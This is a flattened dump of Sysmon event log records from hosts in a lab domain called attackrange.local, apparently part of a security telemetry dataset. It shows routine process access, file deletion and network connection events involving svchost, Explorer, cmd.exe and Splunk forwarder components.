07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806172Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806171Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806170Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806169Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806168Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:28.308{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.308{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.294{0C1E0330-F2DC-60EB-4179-00000000D001}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.167{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7ABFAC088C6698E301ADF3AE934307,SHA256=2BBE122EA4EC875A22B0D395BE0587BCFBC3E652E9DA3CEDEAC48E16ADF036FE,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001046040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:28.076{466BC892-32D3-60E8-770B-00000000CF01}63567316C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.076{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63565264C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:28.055{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.040{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:28.040{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:28.008{466BC892-F2DB-60EB-EE7C-00000000CF01}964316C:\Windows\system32\conhost.exe{466BC892-F2DB-60EB-ED7C-00000000CF01}9004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:27.992{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F2DB-60EB-EE7C-00000000CF01}96C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 23542300x8000000000000000806162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:28.011{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D529B2A86BA08519A538C5D65734B32,SHA256=D5E3C4A84615645C0624EB6A4C1B699A5AAC7716C9996C60B06C31DB2C5E25AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:21.647{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50913-false10.0.1.12-8000- 23542300x80000000000000001046044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:29.471{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DC8A32F8FAF37AA0FD45887FA8C7968,SHA256=AF64CCDB938ADBBD9AB95EEA536BEE1C7F4666A3534FA33172504F9FF10DAE82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:29.308{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1A610F09338202E4210FAE1F99D3C9D,SHA256=80048A7A525B617A5298476986E2F8442977AAD776669F016A22B5CE0E68CCF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:29.167{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557339664F63238A788C2F34CC9A43AB,SHA256=D74D59594328B61D8E17E831B7ADCCE4699CA8ADFA28E9D7D340861130D65E40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:30.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7BBBB1F1B0FDA483698F370161BB5E8,SHA256=F2435A6F90E2EB4344E33C95BA74D8FBA7C5D4E92A211425682EAF849A5801A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:30.183{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
